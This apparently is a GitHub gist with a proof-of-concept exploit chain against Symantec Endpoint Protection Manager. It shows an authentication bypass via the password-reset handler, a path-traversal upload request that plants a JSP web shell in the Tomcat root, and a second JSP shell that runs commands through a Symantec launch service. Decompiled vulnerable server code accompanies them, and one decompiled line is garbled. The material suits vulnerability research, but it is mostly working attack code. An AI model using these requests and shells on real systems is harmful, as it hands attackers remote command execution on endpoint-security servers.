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Last active August 29, 2015 14:26
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  • Save mwulftange/ecbb9a8b8f433118a514 to your computer and use it in GitHub Desktop.
Save mwulftange/ecbb9a8b8f433118a514 to your computer and use it in GitHub Desktop.
POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/exec.jsp&KnownHosts=. HTTP/1.1
Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40
Content-Length: 124
<%=new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("\\A").next()%>
/* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc)
/* */ {
/* 54 */ NodeList list = doc.getElementsByTagName("Response");
/* 55 */ Element root = (Element)list.item(0);
/* 56 */ String action = (String)requestData.get("Action");
/* 57 */ String id = (String)requestData.get("GUID");
/* 58 */ String fileType = (String)requestData.get("FILE_TYPE");
/* 59 */ String newId = (String)requestData.get("NEW_GUID");
/* */
/* 60-187 skipped */
/* */
/* 189 */ if (action.equalsIgnoreCase("UploadPackage")) {
/* 190 */ String fileName = (String)requestData.get("PackageFile");
/* 191 */ String dirName = (String)requestData.get("KnownHosts");
/* */
/* 193 */ this.packageTempPath = (ScmProperties.getServerHome() + ConstantValue.TEMP_PACKAGE_RELATIVE_PATH);
/* */
/* */
/* 196 */ if ((dirName != null) && (dirName.length() > 0) && (!dirName.contains("/")) && (!dirName.contains("\\"))) {
/* 197 */ this.packageTempPath = (this.packageTempPath + File.separator + dirName);
/* */ }
/* 199 */ String path = this.packageTempPath + File.separator + fileName;
/* 200 */ FileOutputStream fos = null;
/* 201 */ BufferedOutputStream bos = null;
/* 202 */ Object is = null;
/* 203 */ BufferedInputStream bis = null;
/* */
/* 205 */ File folder = new File(this.packageTempPath);
/* 206 */ if (!folder.exists()) {
/* 207 */ if (!folder.mkdirs()) {
/* 208 */ root.setAttribute("ResponseCode", String.valueOf(303169573));
/* */ }
/* */ }
/* */ else {
/* */ try
/* */ {
/* 214 */ Utility.emptyDir(folder.getCanonicalPath(), false);
/* */ } catch (IOException e) {
/* 216 */ ServerLogger.log(this, e);
/* 217 */ root.setAttribute("ResponseCode", String.valueOf(303169573));
/* */
/* 219 */ return;
/* */ }
/* */ }
/* */
/* 223 */ byte[] buf = new byte[1024];
/* 224 */ int read = 0;
/* */ try
/* */ {
/* 227 */ is = new BufferedInputStream(requestData.getInputStream());
/* 228 */ fos = new FileOutputStream(path);
/* 229 */ bos = new BufferedOutputStream(fos);
/* 230 */ bis = new BufferedInputStream((InputStream)is);
/* 231 */ while ((read = > 0) {
/* 232 */ bos.write(buf, 0, read);
/* */ }
/* 234 */ bos.flush();
/* 235 */ root.setAttribute("ResponseCode", String.valueOf(0));
/* */ } catch (IOException ex) {
/* 237 */ ServerLogger.log(this, ex);
/* 238 */ root.setAttribute("ResponseCode", String.valueOf(303169573));
/* */ }
/* */ finally
/* */ {
/* 242 */ IOUtilities.closeInputStream((InputStream)is);
/* 243 */ IOUtilities.closeInputStream(bis);
/* 244 */ IOUtilities.closeOutputStream(fos);
/* 245 */ IOUtilities.closeOutputStream(bos);
/* */ }
/* */
/* 247-328 skipped */
/* */
/* */ }
/* */ }
POST /servlet/ConsoleServlet HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=625B492F4B9B6DA96B5E0C70A8A72F40; Path=/; Secure; HttpOnly
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/xml;charset=UTF-8
Date: Tue, 30 Jun 2015 11:19:30 GMT
Server: SEPM
Content-Length: 971
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<Response ResponseCode="-2130181964">
<ReportingElement>&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;&#13;
&lt;ReportingInfo AdminType="0" AllowCollectFileFingerprintList="1" AllowDeleteFromQuarantine="1" AllowDisableDownloadAdvisor="1" AllowDisableNetworkThreatProtect="1" AllowEnableAutoProtect="1" AllowEnableDownloadAdvisor="1" AllowEnableNetworkThreatProtect="1" AllowPowerEraserScan="1" AllowRestartComputers="1" AllowScan="1" AllowUpdateContent="1" AllowUpdateContentScan="1" AllowedDomains="" ChangePwd="0" ComplianceOnly="0" ComputerIPs="" ComputerNames="" DateFormat="M/d/yy" DisallowedCentralizedExceptions="0" FullAccessGroupList="" GroupWhiteList="" IsStoredProcedureValid="0" KICKOUTTIME="3600000" Lang="en_US" LastLoginTime="1435663154502" LegacyDomains="" LegacyGroups="" Role="1" Servers="" Session="625B492F4B9B6DA96B5E0C70A8A72F40"/&gt;&#13;
/* */ protected AdminCredential getCredential(RequestData requestData, ConsoleSession session) throws ServerException
/* */ {
/* 367 */ session = session.getNewSession();
/* 368 */ AdminCredential credential = doGetAdminCredentialWithoutAuthentication();
/* 369 */ session.setAdminCredential(credential);
/* 370 */ return credential;
/* */ }
/* */ public void handleRequest(RequestData requestData, ConsoleSession session, Document doc)
/* */ {
/* 72 */ this.requestData = requestData;
/* 73 */ String userName = (String)requestData.get("UserID");
/* 74 */ String domainName = (String)requestData.get("Domain");
/* */
/* 76 */ NodeList list = doc.getElementsByTagName("Response");
/* 77 */ Element root = (Element)list.item(0);
/* */ try
/* */ {
/* 80 */ if (!isValidRequestWithinGivenInterval(requestData.getRemoteIP())) {
/* 81 */ throw new ServerException(-2130182144, 186);
/* */ }
/* */
/* 84 */ checkIfSiteCanRecoverPasswords();
/* 85 */ init();
/* */
/* 87 */ if ((this.sRecipient == null) || (this.sRecipient.length() == 0) || (" ".equals(this.sRecipient))) {
/* 88 */ ServerLogger.log(Level.INFO, "Problem with Mail server Configuration");
/* 89 */ throw new ServerException(-2130182144, 179);
/* */ }
/* */
/* 92 */ AdminCredential credential = getCredential(requestData, session);
/* */
/* 94 */ if ((credential != null) && (credential.getAdminID() != null)) {
/* 95 */ Integer mode = credential.getOptAuthenticationMethod();
/* 96 */ if ((mode != null) && (SemAdministrator.DEFAULT.intValue() != mode.intValue())) {
/* 97 */ ServerLogger.log(Level.INFO, "Particular admin named " + credential.getAdminName() + " is not at Symantec authentication mode. Failed to reset password.");
/* */
/* 100 */ throw new ServerException(-2130182144, 191);
/* */ }
/* */
/* */ }
/* */
/* 106-137 skipped */
/* */
/* */ }
/* */ catch (ServerException e) {
/* 142 */ root.setAttribute("ResponseCode", "" + (e.getErrorCode() | e.getMessageId()));
/* */ }
/* */ }
<%@page import="*,java.util.*,com.sygate.scm.server.util.*"%>
try {
out.print(SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", request.getParameter("cmd"))));
} catch (Exception e) {
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